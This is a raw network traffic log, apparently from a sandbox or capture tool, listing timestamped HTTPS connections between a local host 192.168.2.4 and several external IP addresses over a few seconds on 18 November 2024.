                                            Nov 18, 2024 21:15:46.647295952 CET49740443192.168.2.4142.250.185.164
                                            Nov 18, 2024 21:15:46.647342920 CET44349740142.250.185.164192.168.2.4
                                            Nov 18, 2024 21:15:46.652802944 CET49739443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:47.157064915 CET44349735192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:47.157152891 CET44349735192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:47.159102917 CET49735443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:47.160810947 CET49735443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:47.160855055 CET44349735192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:47.176609993 CET49739443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:47.188397884 CET49741443192.168.2.418.245.31.78
                                            Nov 18, 2024 21:15:47.188441038 CET4434974118.245.31.78192.168.2.4
                                            Nov 18, 2024 21:15:47.188525915 CET49741443192.168.2.418.245.31.78
                                            Nov 18, 2024 21:15:47.188719034 CET49741443192.168.2.418.245.31.78
                                            Nov 18, 2024 21:15:47.188735008 CET4434974118.245.31.78192.168.2.4
                                            Nov 18, 2024 21:15:47.219326973 CET44349739192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:47.340862989 CET44349739192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:47.340903997 CET44349739192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:47.340910912 CET44349739192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:47.341001987 CET44349739192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:47.341111898 CET49739443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:47.341111898 CET49739443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:47.341126919 CET44349739192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:47.365279913 CET49742443192.168.2.4184.28.90.27
                                            Nov 18, 2024 21:15:47.365377903 CET44349742184.28.90.27192.168.2.4
                                            Nov 18, 2024 21:15:47.365556002 CET49742443192.168.2.4184.28.90.27
                                            Nov 18, 2024 21:15:47.367963076 CET49742443192.168.2.4184.28.90.27
                                            Nov 18, 2024 21:15:47.368001938 CET44349742184.28.90.27192.168.2.4
                                            Nov 18, 2024 21:15:47.392280102 CET49739443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:47.456773043 CET44349739192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:47.456789017 CET44349739192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:47.456815004 CET44349739192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:47.456892967 CET49739443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:47.456892967 CET49739443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:47.457916021 CET44349739192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:47.457925081 CET44349739192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:47.457987070 CET49739443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:47.459656954 CET44349739192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:47.459665060 CET44349739192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:47.459721088 CET49739443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:47.489686966 CET44349739192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:47.489700079 CET44349739192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:47.489768028 CET49739443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:47.552494049 CET44349740142.250.185.164192.168.2.4
                                            Nov 18, 2024 21:15:47.552720070 CET49740443192.168.2.4142.250.185.164
                                            Nov 18, 2024 21:15:47.552736998 CET44349740142.250.185.164192.168.2.4
                                            Nov 18, 2024 21:15:47.553771973 CET44349740142.250.185.164192.168.2.4
                                            Nov 18, 2024 21:15:47.553838015 CET49740443192.168.2.4142.250.185.164
                                            Nov 18, 2024 21:15:47.554831028 CET49740443192.168.2.4142.250.185.164
                                            Nov 18, 2024 21:15:47.554893017 CET44349740142.250.185.164192.168.2.4
                                            Nov 18, 2024 21:15:47.573852062 CET44349739192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:47.573862076 CET44349739192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:47.573935032 CET49739443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:47.574573040 CET44349739192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:47.574580908 CET44349739192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:47.574665070 CET49739443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:47.575582981 CET44349739192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:47.575674057 CET49739443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:47.576431990 CET44349739192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:47.576520920 CET49739443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:47.577308893 CET44349739192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:47.577378035 CET49739443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:47.596285105 CET49740443192.168.2.4142.250.185.164
                                            Nov 18, 2024 21:15:47.596345901 CET44349740142.250.185.164192.168.2.4
                                            Nov 18, 2024 21:15:47.606741905 CET44349739192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:47.606955051 CET44349739192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:47.606972933 CET49739443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:47.606981039 CET44349739192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:47.607033014 CET49739443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:47.607033014 CET49739443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:47.607198000 CET44349739192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:47.607259035 CET49739443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:47.607264042 CET44349739192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:47.607309103 CET44349739192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:47.607350111 CET49739443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:47.607350111 CET49739443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:47.607562065 CET49739443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:47.607574940 CET44349739192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:47.641218901 CET49740443192.168.2.4142.250.185.164
                                            Nov 18, 2024 21:15:47.896516085 CET49743443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:47.896569967 CET44349743192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:47.896639109 CET49743443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:47.896831989 CET49743443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:47.896847010 CET44349743192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:48.068636894 CET4434974118.245.31.78192.168.2.4
                                            Nov 18, 2024 21:15:48.069025040 CET49741443192.168.2.418.245.31.78
                                            Nov 18, 2024 21:15:48.069045067 CET4434974118.245.31.78192.168.2.4
                                            Nov 18, 2024 21:15:48.070481062 CET4434974118.245.31.78192.168.2.4
                                            Nov 18, 2024 21:15:48.070560932 CET49741443192.168.2.418.245.31.78
                                            Nov 18, 2024 21:15:48.072195053 CET49741443192.168.2.418.245.31.78
                                            Nov 18, 2024 21:15:48.072279930 CET4434974118.245.31.78192.168.2.4
                                            Nov 18, 2024 21:15:48.072606087 CET49741443192.168.2.418.245.31.78
                                            Nov 18, 2024 21:15:48.072614908 CET4434974118.245.31.78192.168.2.4
                                            Nov 18, 2024 21:15:48.113748074 CET49741443192.168.2.418.245.31.78
                                            Nov 18, 2024 21:15:48.239464045 CET44349742184.28.90.27192.168.2.4
                                            Nov 18, 2024 21:15:48.239546061 CET49742443192.168.2.4184.28.90.27
                                            Nov 18, 2024 21:15:48.243083954 CET49742443192.168.2.4184.28.90.27
                                            Nov 18, 2024 21:15:48.243118048 CET44349742184.28.90.27192.168.2.4
                                            Nov 18, 2024 21:15:48.243648052 CET44349742184.28.90.27192.168.2.4
                                            Nov 18, 2024 21:15:48.285660982 CET49742443192.168.2.4184.28.90.27
                                            Nov 18, 2024 21:15:48.291857004 CET49742443192.168.2.4184.28.90.27
                                            Nov 18, 2024 21:15:48.339335918 CET44349742184.28.90.27192.168.2.4
                                            Nov 18, 2024 21:15:48.441088915 CET4434974118.245.31.78192.168.2.4
                                            Nov 18, 2024 21:15:48.441112995 CET4434974118.245.31.78192.168.2.4
                                            Nov 18, 2024 21:15:48.441122055 CET4434974118.245.31.78192.168.2.4
                                            Nov 18, 2024 21:15:48.441148996 CET4434974118.245.31.78192.168.2.4
                                            Nov 18, 2024 21:15:48.441173077 CET49741443192.168.2.418.245.31.78
                                            Nov 18, 2024 21:15:48.441179037 CET4434974118.245.31.78192.168.2.4
                                            Nov 18, 2024 21:15:48.441195965 CET4434974118.245.31.78192.168.2.4
                                            Nov 18, 2024 21:15:48.441225052 CET49741443192.168.2.418.245.31.78
                                            Nov 18, 2024 21:15:48.441250086 CET49741443192.168.2.418.245.31.78
                                            Nov 18, 2024 21:15:48.442603111 CET4434974118.245.31.78192.168.2.4
                                            Nov 18, 2024 21:15:48.442621946 CET4434974118.245.31.78192.168.2.4
                                            Nov 18, 2024 21:15:48.442663908 CET49741443192.168.2.418.245.31.78
                                            Nov 18, 2024 21:15:48.442672014 CET4434974118.245.31.78192.168.2.4
                                            Nov 18, 2024 21:15:48.442708969 CET49741443192.168.2.418.245.31.78
                                            Nov 18, 2024 21:15:48.442728043 CET49741443192.168.2.418.245.31.78
                                            Nov 18, 2024 21:15:48.536783934 CET44349742184.28.90.27192.168.2.4
                                            Nov 18, 2024 21:15:48.537025928 CET49742443192.168.2.4184.28.90.27
                                            Nov 18, 2024 21:15:48.537096977 CET44349742184.28.90.27192.168.2.4
                                            Nov 18, 2024 21:15:48.537131071 CET49742443192.168.2.4184.28.90.27
                                            Nov 18, 2024 21:15:48.537477016 CET44349742184.28.90.27192.168.2.4
                                            Nov 18, 2024 21:15:48.537560940 CET44349742184.28.90.27192.168.2.4
                                            Nov 18, 2024 21:15:48.537631035 CET49742443192.168.2.4184.28.90.27
                                            Nov 18, 2024 21:15:48.560769081 CET4434974118.245.31.78192.168.2.4
                                            Nov 18, 2024 21:15:48.560792923 CET4434974118.245.31.78192.168.2.4
                                            Nov 18, 2024 21:15:48.560847044 CET49741443192.168.2.418.245.31.78
                                            Nov 18, 2024 21:15:48.560870886 CET4434974118.245.31.78192.168.2.4
                                            Nov 18, 2024 21:15:48.560899973 CET49741443192.168.2.418.245.31.78
                                            Nov 18, 2024 21:15:48.560920954 CET49741443192.168.2.418.245.31.78
                                            Nov 18, 2024 21:15:48.561254978 CET4434974118.245.31.78192.168.2.4
                                            Nov 18, 2024 21:15:48.561300993 CET49741443192.168.2.418.245.31.78
                                            Nov 18, 2024 21:15:48.561306953 CET4434974118.245.31.78192.168.2.4
                                            Nov 18, 2024 21:15:48.561388016 CET4434974118.245.31.78192.168.2.4
                                            Nov 18, 2024 21:15:48.561430931 CET49741443192.168.2.418.245.31.78
                                            Nov 18, 2024 21:15:48.562560081 CET49741443192.168.2.418.245.31.78
                                            Nov 18, 2024 21:15:48.562568903 CET4434974118.245.31.78192.168.2.4
                                            Nov 18, 2024 21:15:48.573592901 CET49744443192.168.2.4184.28.90.27
                                            Nov 18, 2024 21:15:48.573646069 CET44349744184.28.90.27192.168.2.4
                                            Nov 18, 2024 21:15:48.573765039 CET49744443192.168.2.4184.28.90.27
                                            Nov 18, 2024 21:15:48.575264931 CET49744443192.168.2.4184.28.90.27
                                            Nov 18, 2024 21:15:48.575290918 CET44349744184.28.90.27192.168.2.4
                                            Nov 18, 2024 21:15:48.583724976 CET44349743192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:48.583944082 CET49743443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:48.583975077 CET44349743192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:48.585033894 CET44349743192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:48.585110903 CET49743443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:48.585907936 CET49743443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:48.585975885 CET44349743192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:48.586038113 CET49743443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:48.586431980 CET49745443192.168.2.418.245.31.78
                                            Nov 18, 2024 21:15:48.586460114 CET4434974518.245.31.78192.168.2.4
                                            Nov 18, 2024 21:15:48.586683989 CET49745443192.168.2.418.245.31.78
                                            Nov 18, 2024 21:15:48.586898088 CET49745443192.168.2.418.245.31.78
                                            Nov 18, 2024 21:15:48.586905956 CET4434974518.245.31.78192.168.2.4
                                            Nov 18, 2024 21:15:48.593847036 CET49746443192.168.2.4192.229.133.221
                                            Nov 18, 2024 21:15:48.593904972 CET44349746192.229.133.221192.168.2.4
                                            Nov 18, 2024 21:15:48.594007015 CET49746443192.168.2.4192.229.133.221
                                            Nov 18, 2024 21:15:48.594218969 CET49746443192.168.2.4192.229.133.221
                                            Nov 18, 2024 21:15:48.594243050 CET44349746192.229.133.221192.168.2.4
                                            Nov 18, 2024 21:15:48.627358913 CET44349743192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:48.630067110 CET49747443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:15:48.630122900 CET4434974713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:15:48.630213976 CET49747443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:15:48.630426884 CET49748443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:15:48.630506039 CET4434974813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:15:48.630578995 CET49748443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:15:48.630713940 CET49749443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:15:48.630734921 CET4434974913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:15:48.630809069 CET49749443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:15:48.631226063 CET49750443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:15:48.631247044 CET4434975013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:15:48.631361008 CET49750443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:15:48.631465912 CET49747443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:15:48.631494999 CET4434974713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:15:48.631594896 CET49748443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:15:48.631628036 CET4434974813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:15:48.631720066 CET49749443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:15:48.631737947 CET4434974913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:15:48.632015944 CET49750443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:15:48.632040977 CET4434975013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:15:48.632533073 CET49751443192.168.2.4152.199.21.175
                                            Nov 18, 2024 21:15:48.632559061 CET44349751152.199.21.175192.168.2.4
                                            Nov 18, 2024 21:15:48.632611036 CET49751443192.168.2.4152.199.21.175
                                            Nov 18, 2024 21:15:48.632812023 CET49751443192.168.2.4152.199.21.175
                                            Nov 18, 2024 21:15:48.632827044 CET44349751152.199.21.175192.168.2.4
                                            Nov 18, 2024 21:15:48.640219927 CET49743443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:48.640253067 CET44349743192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:48.683008909 CET49743443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:48.707032919 CET49752443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:15:48.707053900 CET4434975213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:15:48.707114935 CET49752443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:15:48.708019972 CET49753443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:48.708106995 CET44349753192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:48.708184004 CET49753443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:48.708282948 CET49752443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:15:48.708296061 CET4434975213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:15:48.708507061 CET49753443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:48.708544016 CET44349753192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:48.754801989 CET44349743192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:48.754828930 CET44349743192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:48.754837990 CET44349743192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:48.754937887 CET49743443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:48.754992962 CET44349743192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:48.755075932 CET44349743192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:48.755124092 CET49743443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:48.796870947 CET49743443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:48.861571074 CET44349743192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:48.861582994 CET44349743192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:48.861670971 CET49743443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:48.861694098 CET44349743192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:48.861752033 CET49743443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:49.202759027 CET44349743192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:49.202769995 CET44349743192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:49.202912092 CET49743443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:49.202945948 CET44349743192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:49.203022003 CET49743443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:49.203090906 CET44349743192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:49.203099012 CET44349743192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:49.203170061 CET49743443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:49.203186035 CET44349743192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:49.203258991 CET49743443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:49.210190058 CET44349743192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:49.210200071 CET44349743192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:49.210263014 CET49743443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:49.210436106 CET44349743192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:49.210443020 CET44349743192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:49.210494041 CET49743443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:49.212146997 CET44349743192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:49.212213039 CET49743443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:49.213100910 CET44349743192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:49.213181973 CET49743443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:49.213795900 CET44349743192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:49.213851929 CET44349743192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:49.213944912 CET49743443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:49.214118958 CET49743443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:49.214155912 CET44349743192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:49.368509054 CET4434974913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:15:49.369118929 CET49749443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:15:49.369138002 CET4434974913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:15:49.370908022 CET4434974913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:15:49.370985985 CET49749443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:15:49.371012926 CET4434974713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:15:49.371706963 CET49747443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:15:49.371720076 CET4434974713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:15:49.372776985 CET4434974713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:15:49.372834921 CET49747443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:15:49.375751972 CET49749443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:15:49.375844002 CET4434974913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:15:49.375849009 CET49747443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:15:49.375910044 CET4434974713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:15:49.376007080 CET49749443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:15:49.376022100 CET4434974913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:15:49.376053095 CET49747443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:15:49.376060009 CET4434974713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:15:49.378268003 CET4434974813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:15:49.378650904 CET49748443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:15:49.378704071 CET4434974813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:15:49.380162954 CET4434974813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:15:49.380248070 CET49748443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:15:49.381118059 CET49748443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:15:49.381203890 CET4434974813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:15:49.381282091 CET49748443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:15:49.381298065 CET4434974813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:15:49.382086039 CET44349753192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:49.382323027 CET49753443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:49.382389069 CET44349753192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:49.383579969 CET44349753192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:49.383925915 CET49753443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:49.384025097 CET44349753192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:49.384044886 CET49753443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:49.423979044 CET49748443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:15:49.423981905 CET49749443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:15:49.423995972 CET49747443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:15:49.424006939 CET49753443192.168.2.4192.232.223.48
                                            Nov 18, 2024 21:15:49.424068928 CET44349753192.232.223.48192.168.2.4
                                            Nov 18, 2024 21:15:49.728328943 CET4434974518.245.31.78192.168.2.4
                                            Nov 18, 2024 21:15:49.728593111 CET49745443192.168.2.418.245.31.78
                                            Nov 18, 2024 21:15:49.728615999 CET4434974518.245.31.78192.168.2.4
                                            Nov 18, 2024 21:15:49.729661942 CET4434974518.245.31.78192.168.2.4
                                            Nov 18, 2024 21:15:49.729752064 CET49745443192.168.2.418.245.31.78
                                            Nov 18, 2024 21:15:49.729762077 CET44349744184.28.90.27192.168.2.4
                                            Nov 18, 2024 21:15:49.729984999 CET49744443192.168.2.4184.28.90.27
                                            Nov 18, 2024 21:15:49.732695103 CET4434975213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:15:49.733248949 CET49744443192.168.2.4184.28.90.27
                                            Nov 18, 2024 21:15:49.733262062 CET44349744184.28.90.27192.168.2.4
                                            Nov 18, 2024 21:15:49.733584881 CET44349744184.28.90.27192.168.2.4
                                            Nov 18, 2024 21:15:49.734775066 CET4434975013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:15:49.734782934 CET49744443192.168.2.4184.28.90.27
                                            Nov 18, 2024 21:15:49.735157967 CET49745443192.168.2.418.245.31.78
                                            Nov 18, 2024 21:15:49.735225916 CET4434974518.245.31.78192.168.2.4
                                            Nov 18, 2024 21:15:49.735693932 CET49752443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:15:49.735701084 CET4434975213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:15:49.736087084 CET49750443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:15:49.736141920 CET4434975013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:15:49.736313105 CET49745443192.168.2.418.245.31.78
                                            Nov 18, 2024 21:15:49.736323118 CET4434974518.245.31.78192.168.2.4
                                            Nov 18, 2024 21:15:49.736973047 CET4434975213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:15:49.737035990 CET49752443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:15:49.737732887 CET4434975013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:15:49.737808943 CET49750443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:15:49.738620043 CET49752443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:15:49.738688946 CET4434975213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:15:49.741625071 CET49750443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:15:49.741764069 CET4434975013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:15:49.741832972 CET49752443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:15:49.741841078 CET4434975213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:15:49.742479086 CET49750443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:15:49.742502928 CET4434975013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:15:49.775341034 CET44349744184.28.90.27192.168.2.4
                                            Nov 18, 2024 21:15:49.781550884 CET49745443192.168.2.418.245.31.78
                                            Nov 18, 2024 21:15:49.797161102 CET49752443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:15:49.797355890 CET49750443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:15:49.843600035 CET4434974913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:15:49.843672991 CET4434974913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:15:49.843725920 CET49749443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:15:49.845160007 CET4434974713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:15:49.845186949 CET4434974713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:15:49.845262051 CET4434974713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:15:49.845263004 CET49747443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:15:49.845514059 CET49747443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:15:49.846008062 CET49749443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:15:49.846029043 CET4434974913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:15:49.856656075 CET4434974813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:15:49.856678963 CET4434974813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:15:49.856735945 CET4434974813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:15:49.856779099 CET49748443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:15:49.856831074 CET49748443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:15:49.868374109 CET4434975213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:15:49.868530035 CET4434975213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:15:49.868581057 CET49752443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:15:49.873007059 CET4434975013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:15:49.873531103 CET4434975013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:15:49.873613119 CET49750443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:15:49.902556896 CET49747443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:15:49.902578115 CET4434974713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:15:49.903054953 CET49748443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:15:49.903068066 CET4434974813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:15:49.903704882 CET49752443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:15:49.903717041 CET4434975213.107.246.45192.168.2.4
                                            Nov 18, 2024 21:15:49.936261892 CET49750443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:15:49.936319113 CET4434975013.107.246.45192.168.2.4
                                            Nov 18, 2024 21:15:49.957532883 CET49757443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:15:49.957565069 CET4434975713.107.246.45192.168.2.4
                                            Nov 18, 2024 21:15:49.957701921 CET49757443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:15:49.957916975 CET49758443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:15:49.957943916 CET4434975813.107.246.45192.168.2.4
                                            Nov 18, 2024 21:15:49.958019972 CET49758443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:15:49.958213091 CET49759443192.168.2.413.107.246.45
                                            Nov 18, 2024 21:15:49.958220959 CET4434975913.107.246.45192.168.2.4
                                            Nov 18, 2024 21:15:49.958267927 CET49759443192.168.2.413.107.246.45
